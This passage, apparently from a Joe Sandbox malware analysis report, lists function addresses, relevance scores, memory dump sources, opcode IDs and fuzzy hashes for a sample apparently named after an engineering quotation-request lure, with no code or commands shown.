                                                                                            • Instruction Fuzzy Hash: 18412731A0D7891FD71E9B3888251757FA5EB97310B1982BFD087CB2E7DD28A8068395
                                                                                            Function 00007FF848F085FA Relevance: 2.8, Strings: 2, Instructions: 320COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O_^$O_^
                                                                                            • API String ID: 0-4076051052
                                                                                            • Opcode ID: 09c1eb3aa24ba4e702313e286b439c0c3c66a507d55e3795eaae02688d0f8174
                                                                                            • Instruction ID: d411f44a9f925e458763bd804cee6e1077830e2013e2e025a74848ca7192993e
                                                                                            • Opcode Fuzzy Hash: 09c1eb3aa24ba4e702313e286b439c0c3c66a507d55e3795eaae02688d0f8174
                                                                                            • Instruction Fuzzy Hash: 2A91133192DB854FE31AEB289C551B17BE0EF52740B5904BED08ECB1D3EA29BC02C745
                                                                                            Function 00007FF848F02611 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O
                                                                                            • API String ID: 0-878818188
                                                                                            • Opcode ID: bf8e8a9ee7dfc3434572e330d7a50fbd990234d2a73b1ed22ba553fa485b6694
                                                                                            • Instruction ID: 02cbeed9ec38add256c280ebd6396098285f01f3e0e393c2a4a95ad8f54ec8fb
                                                                                            • Opcode Fuzzy Hash: bf8e8a9ee7dfc3434572e330d7a50fbd990234d2a73b1ed22ba553fa485b6694
                                                                                            • Instruction Fuzzy Hash: 3AC14930E1DA564FE71AAB9594901B5B3D2FF92341F58417EC48BC71C6EF3CB8428265
                                                                                            Function 00007FF848F099DC Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: 172aeabec0064332bf05a9399399f3e87b0c0aac7d5ade637321580200e86df2
                                                                                            • Instruction ID: f3dd7d70d1f28200d38f43c5085929698ef78f778155bd08fc0e6435e33f840d
                                                                                            • Opcode Fuzzy Hash: 172aeabec0064332bf05a9399399f3e87b0c0aac7d5ade637321580200e86df2
                                                                                            • Instruction Fuzzy Hash: 2C91BE62A4E7D64FE31367745C790A07FB0AE23961B1E41EBC1D4CB5E3E65D280AC326
                                                                                            Function 00007FF848F01F18 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 07bfea6fab31944a4bda41c0758d6b1489649a0515c8e77b6d5e2ad6a6fc5d30
                                                                                            • Instruction ID: efe6b9363044209521758dcba7e75c0ab80cf325df6e9d321a7b6d151c171331
                                                                                            • Opcode Fuzzy Hash: 07bfea6fab31944a4bda41c0758d6b1489649a0515c8e77b6d5e2ad6a6fc5d30
                                                                                            • Instruction Fuzzy Hash: BB61DD30A2CA094FE75CEF0CD482A7173E0FB56344F5441B8D84ECB29BEE25F8928685
                                                                                            Function 00007FF848F07B68 Relevance: 1.0, Instructions: 1050COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c699b948c5b12baaf6fa002c9a2eca777089698ead7401532a9ec4f9ae0d6c84
                                                                                            • Instruction ID: 06a0ac1c322ff4239cd7ce0e46781cdebda10fe6c3994fd13f1fa81bfc4a63ed
                                                                                            • Opcode Fuzzy Hash: c699b948c5b12baaf6fa002c9a2eca777089698ead7401532a9ec4f9ae0d6c84
                                                                                            • Instruction Fuzzy Hash: 0F622770A0DA4A8FE7A8EB18D45567537E1FF96341F0441BDD88EC72D2EF28AC428785
                                                                                            Function 00007FF848F066C8 Relevance: 1.0, Instructions: 997COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 64370f99cde98e3f411ed2550ed80ca8273d2355cd3b6c9b316a2686bd6f9c4a
                                                                                            • Instruction ID: ffd48fad940a363c8d87a1f69dbf029516f6ee011e5a3d8e5ac09ca86a842b90
                                                                                            • Opcode Fuzzy Hash: 64370f99cde98e3f411ed2550ed80ca8273d2355cd3b6c9b316a2686bd6f9c4a
                                                                                            • Instruction Fuzzy Hash: 1142357295E7CA4FE357A7345C640A07FB1AF13650B5A41EBC0C9CB1E3EA1D684AC722
                                                                                            Function 00007FF848F0C810 Relevance: .7, Instructions: 719COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39579885f515a15ab10930a3324d2c074bddc2d7a990979aa3fb8a6e47342e20
                                                                                            • Instruction ID: b8355f8b7ac57ccc213d874849203b349dd2d7c460cdea61df2a30f5d8739424
                                                                                            • Opcode Fuzzy Hash: 39579885f515a15ab10930a3324d2c074bddc2d7a990979aa3fb8a6e47342e20
                                                                                            • Instruction Fuzzy Hash: 36227A31E0EA4A4FE7A8FB2854552B537D1FF96351F1401BED44EC72D6FE18A806838A
                                                                                            Function 00007FF848F07738 Relevance: .6, Instructions: 637COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7cb9c64dc111849bd7b24f281897175d7b8e94feb1caa6b742e5359050708391
                                                                                            • Instruction ID: 02d643112cd14b6e90ef9f8a575be2d9e886785ed2b86f724bcc2ab9fef884b7
                                                                                            • Opcode Fuzzy Hash: 7cb9c64dc111849bd7b24f281897175d7b8e94feb1caa6b742e5359050708391
                                                                                            • Instruction Fuzzy Hash: B2122631E1D94A8FE798EB1C88557B9B7E1FF9A351F0441BAD04CC72C2EF2868498752
                                                                                            Function 00007FF848F126A9 Relevance: .5, Instructions: 547COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c506e89185ac777e0fa29d3e53be2b0492045f23bfb9f7e8026698876d9e405
                                                                                            • Instruction ID: db397bc021d5e55352e54bf9c9b851273602d3c5239344d3a91d2a4d3ac9d29e
                                                                                            • Opcode Fuzzy Hash: 7c506e89185ac777e0fa29d3e53be2b0492045f23bfb9f7e8026698876d9e405
                                                                                            • Instruction Fuzzy Hash: 94F13A31A0C98A4FE76CEB9C881657577D1FF983A0F5402BAD44DCB6D2DB386C0A8785
                                                                                            Function 00007FF848F01D18 Relevance: .5, Instructions: 506COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc79f5920d92437687a62e4f9bd47b72d412ce20e59526acae158b6a1873c98b
                                                                                            • Instruction ID: bfde1c9e871cc5215c51dfa7e393dda5cba7409db1d572234b21e6843dbc1bf4
                                                                                            • Opcode Fuzzy Hash: dc79f5920d92437687a62e4f9bd47b72d412ce20e59526acae158b6a1873c98b
                                                                                            • Instruction Fuzzy Hash: 26E13631A1DA068FEB5CAB2884915B5B3E1FF9A351F2401BDD04FD75C6EE2CB8468784
                                                                                            Function 00007FF848F0F5CA Relevance: .5, Instructions: 469COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9706b5544ffc251648c972d811e9b2d22d3e34d5621467c9c56564c435fb19c9
                                                                                            • Instruction ID: f40e141ca9af0f1439ac167c0d89f19d6d1e8a485cab3ebfe0aaee67f227ed3f
                                                                                            • Opcode Fuzzy Hash: 9706b5544ffc251648c972d811e9b2d22d3e34d5621467c9c56564c435fb19c9
                                                                                            • Instruction Fuzzy Hash: 60E1693190CB8A4FE368EB2894455B577E1EF96350F1481BED88AC71D2FF28AC46C785
                                                                                            Function 00007FF848F0E966 Relevance: .5, Instructions: 458COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f23110c19698ca9c4d076834f3550f04848923ffc883bc2b7b29eee09f8c0580
                                                                                            • Instruction ID: 42e828e76ca43846e74feceeabe5e649a98d30b15c3c5b9931feb7d83a655d69
                                                                                            • Opcode Fuzzy Hash: f23110c19698ca9c4d076834f3550f04848923ffc883bc2b7b29eee09f8c0580
                                                                                            • Instruction Fuzzy Hash: BAE12731E0D94A8FE7A8EB1888153A57BE1FF9A351F0441FAD44CC76D2EF286C0A8751
                                                                                            Function 00007FF848F0BE37 Relevance: .4, Instructions: 430COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb4a66f17a85ce9013906e47c9ac9f0d4a8ff01f6236004c42f15c1782236c72
                                                                                            • Instruction ID: c23d1ba23ebef1eb55786a23311e35a39d9f03b395d6a52ffde1f8b724a2d929
                                                                                            • Opcode Fuzzy Hash: fb4a66f17a85ce9013906e47c9ac9f0d4a8ff01f6236004c42f15c1782236c72
                                                                                            • Instruction Fuzzy Hash: FFD12730A1EA498FDB59EB28C895A7977E1FF56340F1401BDE48AC72D2EF24E802C755
                                                                                            Function 00007FF848F055F0 Relevance: .4, Instructions: 421COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67f67d7921e4c0e21491ef2440639011cfb103c19088758ae5e49de29ec81d4f
                                                                                            • Instruction ID: 5cb9afbf0d0f6c45d8c7984a040a6c832845fc1d8bf87f7ec84d13b4db2bb364
                                                                                            • Opcode Fuzzy Hash: 67f67d7921e4c0e21491ef2440639011cfb103c19088758ae5e49de29ec81d4f
                                                                                            • Instruction Fuzzy Hash: 87D1C53490DA1E4FEB98EF18C441AA973E1FF5A354F1005B9D41AEB196EB74B846CB80
                                                                                            Function 00007FF848F0F6F8 Relevance: .4, Instructions: 353COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: da0a6cd16828b7eafde33bd9a355bf9acf0a602bfca11914402d9b3b262538cb
                                                                                            • Instruction ID: 8e789e0f800fba0f0d1b16f42945a479bf793e23b3a11e3375c148e762041b2c
                                                                                            • Opcode Fuzzy Hash: da0a6cd16828b7eafde33bd9a355bf9acf0a602bfca11914402d9b3b262538cb
                                                                                            • Instruction Fuzzy Hash: 4BB17971A0CA4A4FE368EB1C944167477E1EF96351F0481BAD88DC72D2FF28AC028785
                                                                                            Function 00007FF848F0A66F Relevance: .3, Instructions: 338COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50122762c9582ebf8b6c59ca5291c199a4f410670fe4b7047103fcbc04237926
                                                                                            • Instruction ID: 099edda3d7dfad3dfca2640fee5b5af0006bbd379319d8da7b9976d466979f2c
                                                                                            • Opcode Fuzzy Hash: 50122762c9582ebf8b6c59ca5291c199a4f410670fe4b7047103fcbc04237926
                                                                                            • Instruction Fuzzy Hash: 25A17A31A1C7864FE31DD7299891171B7E2EFC7311F1486BED4C6C32D6EB28A8828745
                                                                                            Function 00007FF848F08690 Relevance: .3, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3394478a2f65630d8da1a37ed89628578cf2f5d6c5e704848d78017aae0a3f97
                                                                                            • Instruction ID: bd2a1b8c8be5b73999a9f24ae6715afa5e2d9615063fe980242b76a740fc7146
                                                                                            • Opcode Fuzzy Hash: 3394478a2f65630d8da1a37ed89628578cf2f5d6c5e704848d78017aae0a3f97
                                                                                            • Instruction Fuzzy Hash: FFA10E30A2CA458FE369EB2898415B1B7E0EF56740B9444BED48BC75D3EA29BC43C785
                                                                                            Function 00007FF848F05505 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 33c1d765888a4e104113fede71f82012dd4997f9b403db91e53e2f80fbaefcdd
                                                                                            • Instruction ID: b6cdc54d73966e8d7fa01e011b6eec94c2473277e374fd51f5b55a1d6b498f24
                                                                                            • Opcode Fuzzy Hash: 33c1d765888a4e104113fede71f82012dd4997f9b403db91e53e2f80fbaefcdd
                                                                                            • Instruction Fuzzy Hash: 71818B36E0DA5A4FE758FB2898101F93B91EF87395F0400BAD449DB1C3EE69B8468750
                                                                                            Function 00007FF848F06B75 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 569d970359ed3ed5e56979f636161fba4f0c6331eb63c67c7aa150f4c33928c6
                                                                                            • Instruction ID: 52b66237ef557349b015ac28b50ac3783d289ace3f6b23bdd640d175e1500a4c
                                                                                            • Opcode Fuzzy Hash: 569d970359ed3ed5e56979f636161fba4f0c6331eb63c67c7aa150f4c33928c6
                                                                                            • Instruction Fuzzy Hash: 8B91A371D0DB8D8FEB49EB68C865AA87BF1FF56340F1400BAD049EB2D2DB286845C715
                                                                                            Function 00007FF848FD10C9 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2328380573.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8eaf935d1c060b70b04493fb8758619a620cd7db65f4c5e24e9c6c59153d760
                                                                                            • Instruction ID: ff883ad70da738b3b82d7ea90a49425724b677c905b48d5a18b07b38403edaf2
                                                                                            • Opcode Fuzzy Hash: e8eaf935d1c060b70b04493fb8758619a620cd7db65f4c5e24e9c6c59153d760
                                                                                            • Instruction Fuzzy Hash: 0771363290DB898FE756EB2888655A5BBE0FF56340F0901FBC04AC72D3DF29A881C755
                                                                                            Function 00007FF848F11945 Relevance: .3, Instructions: 262COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: deef125381b08e09b0b25518386620ff26477205d9abba08b883b7d7fa484635
                                                                                            • Instruction ID: 96fe7598486c8bbef05acc266d1054eb81b4f19bac80ba6f6d9c862cce91bb6e
                                                                                            • Opcode Fuzzy Hash: deef125381b08e09b0b25518386620ff26477205d9abba08b883b7d7fa484635
                                                                                            • Instruction Fuzzy Hash: 7071EF31A0DD899FDB98EB1CD454AA9BBF1FF99350F0501AAD00DC7296DF28AC85CB41
                                                                                            Function 00007FF848F06190 Relevance: .3, Instructions: 260COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ccd7db764e3444e2d374cfc8a0e08d56ff36ea03164323f2ca38ea42b6ce0a97
                                                                                            • Instruction ID: d62bebd8f18e9e232c7991594b401576cf36749abec510c127f7d0ae1a1980d8
                                                                                            • Opcode Fuzzy Hash: ccd7db764e3444e2d374cfc8a0e08d56ff36ea03164323f2ca38ea42b6ce0a97
                                                                                            • Instruction Fuzzy Hash: E181E530A1CA0E8FDB49EF58C4905F9B7A1FF96350F104579D01AD72C6EB39A892CB90
                                                                                            Function 00007FF848F12BB0 Relevance: .2, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca17d5163b41dc96bb17dc6c1db10411221fe35396bf972c46f8e29810fe9631
                                                                                            • Instruction ID: 53131bda8bc58a0ca82325df4f114c32e018c88dd26fc2bf262ecda545a3ec36
                                                                                            • Opcode Fuzzy Hash: ca17d5163b41dc96bb17dc6c1db10411221fe35396bf972c46f8e29810fe9631
                                                                                            • Instruction Fuzzy Hash: 39710631E1DA865FE34AEB7844216A2BBE1FF61354F0446FAC04AC31C7EF2CA9098755
                                                                                            Function 00007FF848F11960 Relevance: .2, Instructions: 248COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f9e357c1d42df6ea7766e8ed7f459358065a7067b2c8511451ec1be006c7db6
                                                                                            • Instruction ID: 5cb1d0d4bc6b8a3cee82e559c0b6aebe1b7acea76cb88b603e01532842acad61
                                                                                            • Opcode Fuzzy Hash: 3f9e357c1d42df6ea7766e8ed7f459358065a7067b2c8511451ec1be006c7db6
                                                                                            • Instruction Fuzzy Hash: 0971AD31A0DD499FDB98EB1CD455AA9BBF1FF99350F0401AAD00EC7296DF24AC85CB81
                                                                                            Function 00007FF848F06660 Relevance: .2, Instructions: 245COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f3cb94d0e7b482e9366df600b2c9bf3e6c7a8e57a35b189f06a98f7030d87b28
                                                                                            • Instruction ID: b2375b7f6edf3381b762c647e492b59c8721da4733505395f7618a4d761f17b2
                                                                                            • Opcode Fuzzy Hash: f3cb94d0e7b482e9366df600b2c9bf3e6c7a8e57a35b189f06a98f7030d87b28
                                                                                            • Instruction Fuzzy Hash: 5171113092CA458FE769EB2898415B1B7E0EF56740F9404BDD49FC75D2EE29BC03CA85
                                                                                            Function 00007FF848F0B9DD Relevance: .2, Instructions: 215COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbd59fa8c924aa76f9a714952025d9fc169a07064cfeea2379eed4a92dd77cdb
                                                                                            • Instruction ID: 04205bad424de8c143426af3d2b609984b11024ae9c4e67ab9891c1987bbd1c0
                                                                                            • Opcode Fuzzy Hash: cbd59fa8c924aa76f9a714952025d9fc169a07064cfeea2379eed4a92dd77cdb
                                                                                            • Instruction Fuzzy Hash: D051283061EB894FD359E72C8451176BBE1EF86751F4406BEE48BC32C6EE29A842C395
                                                                                            Function 00007FF848F07810 Relevance: .2, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07391244ce05a1875e9e2b163342be6cf8447ec49a0398f28507c825ac38ad61
                                                                                            • Instruction ID: 2a75d33ab563de1a5d23266d6881641024f8d8155cdd43f5e34381e60261c77e
                                                                                            • Opcode Fuzzy Hash: 07391244ce05a1875e9e2b163342be6cf8447ec49a0398f28507c825ac38ad61
                                                                                            • Instruction Fuzzy Hash: BF51D130A0CD1E8FEB94EB2C94686B97BE1FF5A341F1501AAD40DC72E2DF24AC408784
                                                                                            Function 00007FF848F0ED68 Relevance: .2, Instructions: 196COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51911fa5b9b2c1badfcdf9bb9c7042be2cdd295dcd2af9ca2e0a86ae6a0cbb05
                                                                                            • Instruction ID: 1033e32693b0b73e474338fa17efc28cc9b4413772b5f6011d8b8da21a61a105
                                                                                            • Opcode Fuzzy Hash: 51911fa5b9b2c1badfcdf9bb9c7042be2cdd295dcd2af9ca2e0a86ae6a0cbb05
                                                                                            • Instruction Fuzzy Hash: 7F616C31D19A4D8FEB94EF688855BADBBF1FF59341F5401BAC00DD7282DE3868858B11
                                                                                            Function 00007FF848F12FD9 Relevance: .2, Instructions: 194COMMON
